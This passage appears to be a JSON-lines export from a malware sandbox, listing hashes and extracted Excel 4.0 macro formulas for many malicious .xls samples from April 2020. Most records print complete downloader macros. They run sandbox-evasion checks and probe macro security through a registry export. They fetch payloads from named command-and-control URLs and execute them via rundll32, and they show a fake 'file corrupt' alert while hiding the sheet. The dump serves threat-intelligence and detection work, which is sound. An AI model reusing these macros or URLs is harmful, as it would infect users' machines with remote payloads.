CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VVmbkZrXjY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b0a93863a74038a7ce48d36ffbb7cd6df096ffa55e6b4160a7aef2a23cc29cc"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b0a93863a74038a7ce48d36ffbb7cd6df096ffa55e6b4160a7aef2a23cc29cc","filesize":116224,"md5":"ccbdd6a5c3d2a86a8c5aa1ab7ae1562c","sha1":"e21f227c6920895c65356889159443a019ffc523","sha256":"2b0a93863a74038a7ce48d36ffbb7cd6df096ffa55e6b4160a7aef2a23cc29cc","sha512":"85d288dfdf867bfdf5811fe3be54b33e4e25d785af6789d962ff8a5bd1b0493bb40d8132aca5d6fb1fd6b6efe5aecfee71c291916ce69262f10d168b239d17f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b0a93863a74038a7ce48d36ffbb7cd6df096ffa55e6b4160a7aef2a23cc29cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xT60jsrhvH\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b23e5035948733f1555d716c5d29516d66e3a218d70b5ba1aac0542cfb3bc2b"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b23e5035948733f1555d716c5d29516d66e3a218d70b5ba1aac0542cfb3bc2b","filesize":185344,"md5":"8f38da9cf66c599a7b5808237da60d72","sha1":"21be85561700766d6ae451a2024634ed3c9e1c49","sha256":"2b23e5035948733f1555d716c5d29516d66e3a218d70b5ba1aac0542cfb3bc2b","sha512":"e877fbf47d9a494fe01af3860021db26c33e506aaa6c30a437c5aac081333577d912d9187206266be3d4309a4fe084f33080e12c3880ed98b894e5e6f651e7e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b23e5035948733f1555d716c5d29516d66e3a218d70b5ba1aac0542cfb3bc2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b25aa5fb75ac89fddb3aeb8651f3728f7b0988790f008fe5e450513f123c63a"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b25aa5fb75ac89fddb3aeb8651f3728f7b0988790f008fe5e450513f123c63a","filesize":145408,"md5":"b0dd8c687980714ba6ac2d5afd55a01d","sha1":"ed79b0fd9ff3c05f19bd249a7f75cefd86aaa328","sha256":"2b25aa5fb75ac89fddb3aeb8651f3728f7b0988790f008fe5e450513f123c63a","sha512":"85a6074a61fb0087a7596d731e6290b8b1ef35b7af3f50147307bffad8769e6bb32e966e3f30419858c81c1439dffef67302e56c610aa6db6ec858a417d254b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b25aa5fb75ac89fddb3aeb8651f3728f7b0988790f008fe5e450513f123c63a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rizGb5Ckrq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b26c860a29686cc02331ed395ce8919d65cd29ef1a41542f7db7f2829d49de3"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b26c860a29686cc02331ed395ce8919d65cd29ef1a41542f7db7f2829d49de3","filesize":111616,"md5":"498355b5b63f7f74dd87d5f5e94828c2","sha1":"be65877dee7526aedd6431ba61f7134b95fa8afb","sha256":"2b26c860a29686cc02331ed395ce8919d65cd29ef1a41542f7db7f2829d49de3","sha512":"f4d567e49461996e710c6862ed3a4abe4e5556f19b48f03f6fe721e3d23bdc38077318c0fa996e2608330e28338167b306ae9d7700ad3e7c16c25e53a62dc52f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b26c860a29686cc02331ed395ce8919d65cd29ef1a41542f7db7f2829d49de3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b27e8edd86839b064a21ca3fb69c4b4d75d0c347eefb15b84dbd298cfefbdfa"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b27e8edd86839b064a21ca3fb69c4b4d75d0c347eefb15b84dbd298cfefbdfa","filesize":168960,"md5":"d56a69b9481ad10c89ff6a3ac97a7ace","sha1":"9c9ae6e4d1c56283182276c1306b7e7a71492f68","sha256":"2b27e8edd86839b064a21ca3fb69c4b4d75d0c347eefb15b84dbd298cfefbdfa","sha512":"973f6a47e5f8df8bad4c49ef682e26f8d2258a8c0a9b372fffa845ed159618d21c22dc3d75d0de99aeabf8fa012c1785b1edfb8217c596ddf2599636c408f458","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b27e8edd86839b064a21ca3fb69c4b4d75d0c347eefb15b84dbd298cfefbdfa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M3NVzBBalE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b47ed92017b4986c1761c58610457ce7e0c998f88a198ebc0ba5a570fd7cfac"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b47ed92017b4986c1761c58610457ce7e0c998f88a198ebc0ba5a570fd7cfac","filesize":152576,"md5":"df325f285222fd13c90e5b4cb96afbcf","sha1":"6b844f9ec9bc86d87e974684693331640292d808","sha256":"2b47ed92017b4986c1761c58610457ce7e0c998f88a198ebc0ba5a570fd7cfac","sha512":"31f3db053c9095d33352f71af327d8cfd3d2f0392cbefe5620f920e014145325b84e5a0efb89fbd3cbc29f06c0b556baabd1b8cbdba1ac41d9f1f419eebe79c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b47ed92017b4986c1761c58610457ce7e0c998f88a198ebc0ba5a570fd7cfac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GWrwGqFj0M\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b4c81c83a88807d5a415a90d408383d7e0c41e6a0620e197822307a7f57b216"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b4c81c83a88807d5a415a90d408383d7e0c41e6a0620e197822307a7f57b216","filesize":103941,"md5":"3da2d62eaaa80eb02b1089f6763dfa78","sha1":"dd8d751a87b97c8197c09c27ab7f939ccd2301e9","sha256":"2b4c81c83a88807d5a415a90d408383d7e0c41e6a0620e197822307a7f57b216","sha512":"b4e23e1e2922df7441ff9c4ecc9cb8697deb9f78eef6d131c0b4c4a42a363ec7ecd7fa85c2f8863438aa7548a4e12d87658e1551b2e857c3b83f2c6d97eda084","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b4c81c83a88807d5a415a90d408383d7e0c41e6a0620e197822307a7f57b216.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b51555e26ceb5a59f7f67ba3d1f96acfa594cae85f3bb1cbef3c818551b1444"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b51555e26ceb5a59f7f67ba3d1f96acfa594cae85f3bb1cbef3c818551b1444","filesize":109568,"md5":"92a2af2721e5e0a275b50378ff087158","sha1":"3af830eda7b44452b91434211b0b16bd9b2f9615","sha256":"2b51555e26ceb5a59f7f67ba3d1f96acfa594cae85f3bb1cbef3c818551b1444","sha512":"b2e432c594e7760ec92e68945664b487b23df3a2d49b306d0dfd0e53a8e2df32564c2b6556dc37b017329b8713e011f1e04400e714db08ddb0c53cbd66436725","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b51555e26ceb5a59f7f67ba3d1f96acfa594cae85f3bb1cbef3c818551b1444.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"1Fj4sj4Dpx\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b6a6862f1e99b12dc4d3686ee508c65ec6b5c0ce0def94f2140cdfd85e130e7"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b6a6862f1e99b12dc4d3686ee508c65ec6b5c0ce0def94f2140cdfd85e130e7","filesize":226304,"md5":"42426cfe185c24f6b89fb9049ceb4954","sha1":"4cb64effcb3d4422b3f6e0669a4db594108ff274","sha256":"2b6a6862f1e99b12dc4d3686ee508c65ec6b5c0ce0def94f2140cdfd85e130e7","sha512":"e1ea6b38255486fec1b0b233a2ae6a6c2cee774c5e3ebbb0f1ab32ca7279b301e8a67b6ced671e3f0c7c66e9bb9576e60d81bea5760e5177b4d57d40f27c7f00","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b6a6862f1e99b12dc4d3686ee508c65ec6b5c0ce0def94f2140cdfd85e130e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"im91PYS3vs\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b6e35f19a97ad0e5316d06d80fd7422a093d9c3d3abe4ff932a6374a68faa22"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2b6e35f19a97ad0e5316d06d80fd7422a093d9c3d3abe4ff932a6374a68faa22","filesize":209408,"md5":"2232d86615b542bf528135dfd54d3266","sha1":"7b1b831050713cb0ebfc641a68d872c688465981","sha256":"2b6e35f19a97ad0e5316d06d80fd7422a093d9c3d3abe4ff932a6374a68faa22","sha512":"e3620af24240240e3ba470ce959c055850bb11549e7044a60056f4d013b57759e5de0387af299d3f4101999b31757d2bfa30c3ab08c5f5ce8723393cc57ef94a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b6e35f19a97ad0e5316d06d80fd7422a093d9c3d3abe4ff932a6374a68faa22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zaunmS86X4\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b75bcc80bec1845cab6fb51a6baa7f314464eff583164a99f5e1e593a675a4d"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2b75bcc80bec1845cab6fb51a6baa7f314464eff583164a99f5e1e593a675a4d","filesize":209408,"md5":"0ed2f437db52e2431f3d42673ad076cd","sha1":"fd12eca8004b8aaa1ffa0b6d920b18d8f46955df","sha256":"2b75bcc80bec1845cab6fb51a6baa7f314464eff583164a99f5e1e593a675a4d","sha512":"05dd31141b892c1570d1c2bea41dba038a1d54621a3ad94b8117d0fbc2d8bfa3126a0f55e4999ca7173477a4d9a1ce9a0a2334c7afe5e307e5d85121b9856114","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b75bcc80bec1845cab6fb51a6baa7f314464eff583164a99f5e1e593a675a4d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"svZtbPjEMp\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b770c69898f304031947ee86fd588e355870a1c97f6a80f86fdf1a15d9e2c2e"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2b770c69898f304031947ee86fd588e355870a1c97f6a80f86fdf1a15d9e2c2e","filesize":206336,"md5":"9ebdeea63a136b3f59449445a0faa7c2","sha1":"dc509594576072ca15fe03701297f5503b8750ed","sha256":"2b770c69898f304031947ee86fd588e355870a1c97f6a80f86fdf1a15d9e2c2e","sha512":"d1c6c4187a068fdeb4d07f20bfc6c94963a91eec7cae20a3d57115240c4bfdcffb92e7fd522db4dd1319a3ac82ea56fc9b3b904e7860d1c11d4f073c73159ee7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b770c69898f304031947ee86fd588e355870a1c97f6a80f86fdf1a15d9e2c2e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fMT7kRJD3I\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b92f602d8c44238b77f4827e074344ef506d7023efaf0e185fd09b252efc108"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2b92f602d8c44238b77f4827e074344ef506d7023efaf0e185fd09b252efc108","filesize":216064,"md5":"ea69b35b47367b8ac172ad192a25f38e","sha1":"a5c011ef58d9dce6b26e92b3ff3ec062d172a087","sha256":"2b92f602d8c44238b77f4827e074344ef506d7023efaf0e185fd09b252efc108","sha512":"f9bd3e9999c17a156f67b8a1a8917d760abbd3d5f00304523421d83f083bc9df261f47eb261b5313b5fd79b4be1d774076c3b596f5e27e3dad6a7f52058d39f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b92f602d8c44238b77f4827e074344ef506d7023efaf0e185fd09b252efc108.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rGWONkfurq\",TRUE)\nGOTO(IF(GET.WORKSPACE(19),,CLOSE(TRUE)))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\nIF(R$15C$17\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2b94f1b7e886d57c4833283a35d79a8fbf74d3f379dc28d6723e6c3372cb2cd8"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2b94f1b7e886d57c4833283a35d79a8fbf74d3f379dc28d6723e6c3372cb2cd8","filesize":206336,"md5":"574896502c749ef0f20eb7bf04f09446","sha1":"753265114e7a9890c9c2f83b5dd5808ed0963cd6","sha256":"2b94f1b7e886d57c4833283a35d79a8fbf74d3f379dc28d6723e6c3372cb2cd8","sha512":"af056cea49449a0f070904355c03f616fbe59439908cbad115c09e0b5e50c1e6694acbf6a293b5faa30f6d772788faabdff2243faa00053d40261a5dc92f69cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2b94f1b7e886d57c4833283a35d79a8fbf74d3f379dc28d6723e6c3372cb2cd8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 